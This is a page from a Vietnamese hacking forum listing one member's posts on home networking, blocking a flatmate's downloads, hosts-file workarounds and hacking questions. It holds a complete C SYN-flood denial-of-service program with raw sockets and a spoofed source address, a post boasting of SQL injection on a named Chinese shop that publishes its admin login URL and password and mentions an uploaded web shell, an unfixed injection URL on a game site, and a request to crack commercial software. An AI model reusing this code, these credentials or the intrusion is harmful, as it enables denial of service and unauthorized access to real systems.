banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: nguyenga86  XML
Profile for nguyenga86 Messages posted by nguyenga86 [ number of posts not being displayed on this page: 0 ]
 
vậy thì sửa file host
xxx.xxx.xxx.xxx localhost
mấy cái xxx kia là IP mà phần mềm đó connect đến
mình có 1 cách hay xài như vầy , xài cain abel để sniff xem họ hay download ở site nào , stream đó có IP là gì , sau đó vô modem khoá IP đó lại thôi , như ở xóm mình(mạng FPT ) thì khi khoá IP 210.245.14.x với subnet 255.255.255.0 thì youtube và mp3.zing.vn tịt luôn( có 1 số IP khác như stream của mediafire...etc thì bạn tự tìm nhé ) ^^, vẫn vào đc web như bình thường chỉ ko load được stream thôi smilie , trước hay block site nhưng cách này thô thiển lộ liễu quá ^^ , khoá stream lại là đc rồi , thi thoảng đang chơi DotA mà nó xem youtube là feed thôi rồi smilie , khoá cái stream lại đánh nốt trận rồi mở ra hehe , xài cách này cho các bạn kia tha hồ proxy hay gì gì nữa cũng ko bao giờ download được ...
cái này chặn trên modem được mà , mình dùng modem cá nhân comtrend thôi cũng có chức năng chặn port , khoá cái port đó lại lài hết chui ra chui vô
nếu là học hành bài bản thì ko nên học Autoit , Autoit chỉ thích hợp cho những người thích kiểu mỳ ăn liền ( giống như mình ^^ ) , ưu điểm của nó là đơn giản và rất dễ nắm bắt , nếu bạn học C++ thì sẽ mất khá lâu trước khi có thể viết 1 ứng dụng có GUI , còn autoit thì chỉ mất 1 lúc đọc file help và xem example ... hồi trước mình học trong trường cũng dạy C++ , học trượt lên trượt xuống ( vì lười học smilie ) nhưng làm quen với autoit 1 thời gian cũng viết được 1 số phần mềm cây nhà lá vườn để tự xài
xài hiren boot CD / smart FDISK ấy , trong CD đó đầy tool format mà , virus gì cũng bay hết
mình nghĩ cái này dùng wincap mới được

breakoflove wrote:

Mình muốn chặn luôn từ IP ( cái này mình sợ Ping of death)  

hình như với các hệ điều hành hiện thời thì ping of death đâu còn tác dụng nữa nhỉ ? với lại disable cái ICMP đi là hết ping chứ có gì đâu

breakoflove wrote:

Mình thấy game này cũng ít người chơi, với lại mỗi lần chơi thì hay chơi ở nhà, gần như IP không thay đổi.  


ở VN đa phần là xài dynamic IP , nếu vì 1 lí do nào đó người ta reset modem 1 cái là thy đổi IP , vầy là khỏi chơi rồi smilie
mình ko biết ngôn ngữ lập trình java nhưng ý tưởng chung cho cái này thì bạn thêm 1 hàm kiểm tra ở phần đầu chương trình thực hiện việc kiểm tra xem process của chương trình đã tồn tại hay chưa là được mà
chào mọi người , mình có 1 thắc mắc mong mọi người giải đáp giùm , hôm trước cài backtrack ra nghịch , rảnh scan cái site của game mình đang chơi và phát hiện lỗi SQL ịnection cua site ở link này :
Code:
http://bod.gameyez.com/views/?lyt=community&mname=news&spage=list&page=d%27z%220

mình cũng không biết có nghiêm trọng ko vì kiểu thông báo lỗi này nhìn hơi lạ . cái tool scan w3af nó đánh giá là lỗi nguy hiểm , đã report cho GM bên đó nhưng đã qua vài cái server maintaince rồi mà ko thấy họ fix , cũng chẳng thấy nói năng gì cả . Vậy cho mình hỏi là lỗi này có phải là lỗi nguy hiểm giống như các lỗi SQL Ịnection khác ko , và lỗi này có phải là ko fix được ko mà sao họ ko fix nhỉ ??
cách khác thì mình ko biết nhưng thường thì mình dùng Live HTTP headers , nhưng mà cách này cũng tương đối thôi vì có nhiều site nó sửa cái thông tin cho ta biết server là loại gì rồi , sửa thành abcxyz gì đó là hết biết , cả cái X-Power by : abc gì đó cũng hidden luôn --> gây khó khăn cho bước footprint gì gì đó , cái này ngăn đc mấy tên hiếu động nghịch ngợm thôi , gặp pro thì đừng nói là server mà có khi admin hôm nay mặc quần đùi màu gì cũng biết ấy chứ smilie
có 2 cách thường làm để vào FB với tốc độ bình thường hiện này là sửa file host và đổi DNS , bạn google 1 cái là được mà có gì khó đâu , nếu là file host thì mình hiện đang dùng dải IP sau
Code:
153.16.15.71 upload.facebook.com
96.17.180.162 www.facebook.com
96.17.180.162 www.login.facebook.com
96.17.180.162 facebook.com
153.16.15.71 apps.facebook.com
153.16.15.71 login.facebook.com
96.17.180.162 graph.facebook.com
96.17.180.162 vi-vn.connect.facebook.com
96.17.180.162 vi-vn.facebook.com
96.17.180.162 static.ak.connect.facebook.com
96.17.180.162 developers.facebook.com
96.17.180.162 error.facebook.com
96.17.180.162 channel.facebook.com
96.17.180.162 register.facebook.com
96.17.180.162 bigzipfiles.facebook.com
96.17.180.162 pixel.facebook.com


DNS thì mình thường dùng DNS của google : 8.8.8.8 và 8.8.4.4
tuy nhiên hiện tại với 2 cách này thì upload và applications đôi khi ko được ( nhưng post , view ,comment bình thường ) hoặc nếu bạn dùng Firefox thì có thể cài addon này : AnonymoX

petun wrote:
Em đang có 1 vấn đề kính mong mấy anh giúp. Số là em đang xài mạng của FPT, sử dụng modem Comtrend CT6383 4 port. Em đã cố gắng dò IP của các máy trong LAN (kể cả thủ công lẫn phần mềm) đều k được. Em đã tiến hành reset mềm lẫn reset cứng đều k thành công. Em k thể chia sẽ file cũng như set LAN game. Có pro nào biết cách khắc phục k ạ ??? 


vậy bạn có connect được internet ko ? nếu bạn cầm password modem thì vào xem DHCP server enable chưa , trước máy mình cũng bị gần giống vậy , ping đến modem ko được --> ko connect đc cả LAN lẫn WAN , sau vào modem enable DHCP lên rồi reset modem và reset PC là được , muốn biết các IP và MAC trong LAN thì vào modem , phần device info đó , DHCP là list tất cả các IP trong LAN kèm cả MAC , còn phần ARP là IP các máy đang online ( cái này tương đối trong 1 khoảng thời gian ) , hoặc để scan các IP trong LAN mình hay dùng Cain Abel smilie

anpha wrote:
Em post nhầm code. Cái này cơ, xin lỗi vì chức năng sửa bài không hoặt động cho members
Code:
/*
Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<netinet/tcp.h> //Provides declarations for tcp header
#include<netinet/ip.h> //Provides declarations for ip header
typedef struct pseudo_header //needed for checksum calculation
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
//char tcp[28];
struct tcphdr tcp;
};
unsigned short csum(unsigned short *ptr,int nbytes) {
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
int main (void)
{
//Create a raw socket
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
//Datagram to represent the packet
char datagram[4096];
//IP header
struct iphdr *iph = (struct iphdr *) datagram;
//TCP header
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
struct sockaddr_in sin;
struct pseudo_header psh;
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
memset (datagram, 0, 4096); /* zero out the buffer */
//Fill in the IP Header
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
iph->id = htonl (54321); //Id of this packet
iph->frag_off = 0;
iph->ttl = 255;
iph->protocol = IPPROTO_TCP;
iph->check = 0; //Set to 0 before calculating checksum
iph->saddr = inet_addr ("192.168.1.2"); //Spoof the source ip address
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
//TCP Header
tcph->source = htons (1234);
tcph->dest = htons (80);
tcph->seq = 0;
tcph->ack_seq = 0;
tcph->doff = 5; /* first and only tcp segment */
tcph->fin=0;
tcph->syn=1;
tcph->rst=0;
tcph->psh=0;
tcph->ack=0;
tcph->urg=0;
tcph->window = htons (5840); /* maximum allowed window size */
tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
should fill in the correct checksum during transmission */
tcph->urg_ptr = 0;
//Now the IP checksum
psh.source_address = inet_addr("192.168.1.2");
psh.dest_address = sin.sin_addr.s_addr;
psh.placeholder = 0;
psh.protocol = IPPROTO_TCP;
psh.tcp_length = htons(20);
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
//IP_HDRINCL to tell the kernel that headers are included in the packet
{
int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
printf ("Warning: Cannot set HDRINCL!n");
}
//while (1)
//{
//Send the packet
if (sendto (s, /* our socket */
datagram, /* the buffer containing headers and data */
iph->tot_len, /* total length of our datagram */
0, /* routing flags, normally always 0 */
(struct sockaddr *) &sin, /* socket addr, just like in */
sizeof (sin)) < 0) /* a normal send() */
printf ("errorn");
//Data send successfully
else
printf (".");
//}
return 0;
}
 



nếu mình ko nhầm thì cái code này bạn lấy ở site binarytides.com
link day http://www.binarytides.com/blog/syn-flood-dos-attack/
cái này sẽ send một SYN packet đến server nào đó với invalid source IP , xài raw socket để tạo ra packet .
khi uncomment vòng lặp while thì nó sẽ send packet liên tục hay còn gọi là flood đó
xài wireshark capture thấy cũng flood điên cuồng lắm nhưng ko biết bên server thế nào , mình nghĩ cái này để học thôi chứ chắc ko flood đc ai đâu smilie
lí giải thì cũng chỉ có 3 lí do thôi :
- virus
-lỗi win
-gói cài đặt bị lỗi hoặc xung đột gì đó
cách giải quyết :
-scan virus ( đôi khi scan xong win die smilie )
-ghost hoặc cài win mới ( nhớ scan virus trước )
-download gói cài đặt khác để cài (download thì tìm homepage của nó mà download về , download nguồn linh tinh dễ đc khuyến mại thêm mấy con trojan lắm smilie )
muốn cụ thể hơn thì quăng cái error mesage lên đây , cũng chỉ là 1 phần mềm thôi mà , cài ko nổi thì hơi vô lí nhẩy smilie
pass modem chỉ có mình giữ thôi , ko ai biết cả hic ... có khi vác sách sang học hắn thôi T____T
netcut chỉ cắt mấy con gà thôi chứ thằng cha kia nó nó còn biết nhiều hơn mình cắt gì nổi , con modem nhà mình là con comtrend kùi bắp thôi , ADSL cá nhân mà , làm gì có nhiều chức năng đâu . lock port + filter URL rồi đấy chứ , mà có stop hắn đc đâu smilie , pó tay luôn
đương nhiên là lock xong mình cũng hết xài luôn , chỉ chơi game đc thôi , mình chỉ định lock khi nào hắn download thôi , khi nào ko download nữa thì lại mở ra cho xài bình thường mà , thực sự ko thể hiểu nổi lock port + URL filter rồi mà tại sao còn có thể download được , loại trừ trường hợp xài torent nha vì khi xài torent thì ping request time out liên tục , còn ở đây chỉ là ping rất cao thôi , ko có bị request time out ....
Mình có share internet với một người khác , nhưng hắn rẩt hay download , mỗi lần download cả chục cửa sổ IDM làm mình ko làm gì đc , mình đã lock port 80 , 8080 , 3128 trên modem , set ULR filter block toàn bộ link có chứa http , nhưng chẳng hiểu hắn dùng cái gì vẫn download được . nói chuyện với hắn thì hắn cứ ừ xong lại đâu đóng đấy , ko share nữa thì hoá đơn internet hơi nặng ... có ai biết cách vẫn vào đc mạng hay download khi modem bị config như trên ko ? làm sao để ngăn chặn ?
hôm nay mình khai thác được lỗi SQL ịnection của một site china , site này bán nước hoa thì phải , đã tìm thấy admin account và link admin , nhưng khi đăng nhập thành công thì nó vào admincp nhưng lại ko làm gì đc vì chả có chỗ nào click chuột vào đc , dùng google dịch cái mớ văn bản tiếng china của cái site đó thì nó có 1 đoạn nói về cơ chế xác thực mật khẩu kép , các bạn có ai biết cơ chế đó như thế nào ko ?
đây là link admin : http://www.nubiz.com.cn/admin/login.asp
còn đây là tài khoản admin
ID :admin
pass: 123456
chưa bao giờ gặp cái cảnh củ chuối như vậy , vào đc mà chả làm đc gì
upload được cả shell lên rồi mà ko phân biệt được lệnh linux với window .....pó tay
nhập vào đâu thế bạn ? vào notepad à ? smilie)
nó thực hiện 1 câu lệnh SQL giúp bypass login (hình như thế smilie )....
cái này bây giờ mà thực hiện chắc 99% là thất bại smilie
Mình xin nói trước là mình ko học hay làm về IT , chỉ là yêu thích IT nên muốn tìm hiểu thôi , mong mọi người giúp mình giải thích cái này . máy tính của mình chạy 2 OS là window 7 và Ubuntu 10 . Mình có cài VBB trên localhost của cả 2 OS sau đó up shell lên . Ở window 7 thì sau khi up shell xong thì vao trình duyệt chat : localhost/forum/images/shell.php thi` chạy shell chạy được ngay . Nhưng sang Ubuntu thì khi làm tương tự lại ko được , nó ra blank screen luôn , vào trong /var/www/forum/images thi` thấy cái file shell kia nó có dấu X to đùng trên đầu , phải có quyền root thì mới chạy được , sau khi dung quyền root để set lại permision cho con shell thì vào localhost/forum/images/shell.php mới thấy nó work , như vậy khi up shell len window thì chạy được ngay , còn up len linux thì lại phải set permision mới chạy được , mình ko hiểu là nếu như vậy thì bình thường khi ko có quyền root thì làm sao hacker có thể làm cho shell nó work trên server linux ? Và đây có phải là do linux bảo mật tốt hơn window ( ít nhất là chế độ phân quyền chặt chẽ hơn ? )
mọi người giúp mình với , hồi trước mình có xài WPE để bắt packet qua lại của thằng softcast và có túm đc IP với port của cái server cung cấp chương trình xem TV trên softcast , sau đó thiết lập 1 cái rule trên modem để softcast chỉ xem đc vào những giờ nhất định . Nhưng ko hiểu sao cái rule đó lại bị xoá mất mặc dù password modem chỉ có mình giữ , sau đó thì mình lại dùng WPE để scan lại khi chạy softcast thì mấy cái packet qua lại ko thấy có IP với pỏt của server mà lại toàn la IP của local host với các port khác nhau , cả Source IP và Destination IP đều là IP cua local host. port thì khác nhau . Cái rule cũ bị xoá hồi trước mình chỉ lock port là đã ngăn đc softcast rồi , nhưng bây giờ rule bị mất . ko nhớ port nên ko thiết lập lại đc , thi thoảng scan cũng ra cái IP khác nhưng thiết lập Rule với IP và port đó ko có tác dụng . Mọi người giúp mình với. Thanks
các bác cho em hỏi packet filter và proxy sever có thể edit packet được ko ? ý tưởng cua em là dùng một cái packet filer , dùng cái này để edit các packet client-server theo ý mình , tức la packet đi qua filter thì thằng filter nó sẽ sửa cái phàn data của packet sau đó tiếp tục gửi đến sever , khi đó thi packet sẽ là hợp lệ vì tát cả mấy cái như la Destination host and port , IP header , seq , ack, sesion ID.... linh tinh gì đó vẫn đúng , túm lại là em có 1 mẫu packet cho trước , sẽ dùng cái packet filter để sửa cái packet của client gửi cho sever thành giống như cái packet mẫu kia ( chỉ phần nội dung packet thôi) , giống như kiểu nó gửi packet gì qua cũng bị sửa thành 1 cái packet có nội dung giống packet mẫu ( để replay 1 hành động nào đó khi mà client chỉ làm 1 lần nhưng sau khi wa packet filter thi sever lại hiểu là nó làm đến mấy lần đó . Em ko phải dân tin học nên trình bày có hơi lung tung một chút các bác đừng chém em smilie .
các bác có ai biết phần mềm ghostreplay GX , phần mềm đó rất hữu dụng , giảm delay time của hầu hết các loại giao thức mạng ( có thể từ ngữ em dùng ko đc chính xác lắm các bác thông cảm smilie ), em đã thử crack phần mềm này nhưng ko biết nó pack bằng gì nên thất bại từ bước đầu tiên , có ai crack đc phần mềm này chưa ạ? em lục tung google lên mà chẳng thấy cái crack hay serial gì cả , mong các bác giúp đỡ , cảm ơn các bác
 
Go to Page:  First Page Page 3 4 5 6

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|